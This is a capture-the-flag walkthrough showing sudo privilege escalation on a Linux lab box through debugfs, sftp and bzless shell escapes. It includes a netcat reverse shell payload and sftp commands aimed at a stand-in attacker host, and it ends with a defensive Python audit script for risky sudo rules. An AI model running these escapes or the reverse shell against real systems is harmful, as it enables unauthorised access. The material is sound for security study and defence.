Box: Anvil
Level: Intermediate
OS: Linux
Let's get started
Let's connect to the machine
command: nc -t 10.0.40.10 1337
Cool, we are connected to the target.
Running the sudo -l command
We can see that user silver can run the binary debugfs with sudo privileges. This is what we call Misconfigured SUDO Privileges
Checking GTFOBins, I found this
So, to escalate our privileges
command: sudo -u silver /sbin/debugfs
Good, now run this !/bin/sh
Nice, we were able to successfully escalate our privileges to user silver
Now, let's further escalate our privileges
Running the sudo -l command again,
So, user gold has sudo permissions to run the binary sftp
Checking GTFOBins, I found this
So we can try to do something like this
command: HOST=blackanon@attacker.com
Cool, now run this sudo -u gold /usr/bin/sftp $HOST
Oops, we can see that it's ssh running here. So, I decided to trigger the help menu
We can use that switch (-S) to run a program; this means we can try to execute a reverse shell
Payload
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f
Save this in a .sh file and send it over to the target
Cool, now let's execute that command again, but this time ensure you have your netcat listener set up
command:
chmod +x bash.sh
HOST=blackanon@attacker.com
sudo -u gold /usr/bin/sftp -S /tmp/bash.sh $HOST
It worked, we got a shell as user gold.
Further escalating our privileges
Running the sudo -l command again
We see that user ETSCTF can run the binary bzless with sudo privileges
To do this,
command: sudo -u ETSCTF /bin/bzless
It requires a file parameter, what if we tried something like this
command: sudo -u ETSCTF /bin/bzless /bin/bash
We get this, so just run this !/bin/sh
Hit the enter key,
It worked hehe.
We have successfully completed this exercise😎
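Seen from the defender's side, every step above is a sudo rule that hands out a shell as another user. The following Python script is an added example, not part of the original walkthrough: it parses sudo -l output and flags rules for the three binaries used here. The sample listing, the user "player", the host name and the NOPASSWD tag are constructed assumptions.

```python
import os
import re

# Binaries this walkthrough turned into a shell, and why each one is risky.
# Only the page's three; extend the table from your own GTFOBins review.
SHELL_ESCAPE = {
    "debugfs": "'!' command at its prompt runs a shell",
    "sftp": "-S lets the caller choose the program to run",
    "bzless": "'!' command in the pager runs a shell",
}

ENTRY = re.compile(r"^\s+\((?P<runas>[^)]+)\)\s*(?P<rest>.+)$")  # "(user) cmds"
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")  # NOPASSWD:, SETENV:, ...


def audit_sudo_listing(text):
    """Return (runas, command, reason) for each risky rule in `sudo -l` output."""
    findings = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # headers and Defaults lines carry no "(runas)" prefix
        commands = TAGS.sub("", m.group("rest")).split(",")
        for cmd in filter(None, (c.strip() for c in commands)):
            if cmd == "ALL":
                findings.append((m.group("runas"), cmd, "unrestricted"))
                continue
            name = os.path.basename(cmd.split()[0])
            if name in SHELL_ESCAPE:
                findings.append((m.group("runas"), cmd, SHELL_ESCAPE[name]))
    return findings


# Constructed sample: three listings like the ones in this walkthrough plus one
# harmless rule. The user "player", host "anvil" and NOPASSWD tag are assumptions.
SAMPLE = """\
User player may run the following commands on anvil:
    (silver) NOPASSWD: /sbin/debugfs
User silver may run the following commands on anvil:
    (gold) NOPASSWD: /usr/bin/sftp
User gold may run the following commands on anvil:
    (ETSCTF) NOPASSWD: /bin/bzless, /usr/bin/uptime
"""

if __name__ == "__main__":
    for runas, cmd, reason in audit_sudo_listing(SAMPLE):
        print(f"RISKY: run as {runas}: {cmd} ({reason})")
```

Each finding is equivalent to giving the caller a shell as the run-as user, so the fix is to remove the rule or replace the binary with a wrapper that takes no caller-controlled arguments.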
That will be all for today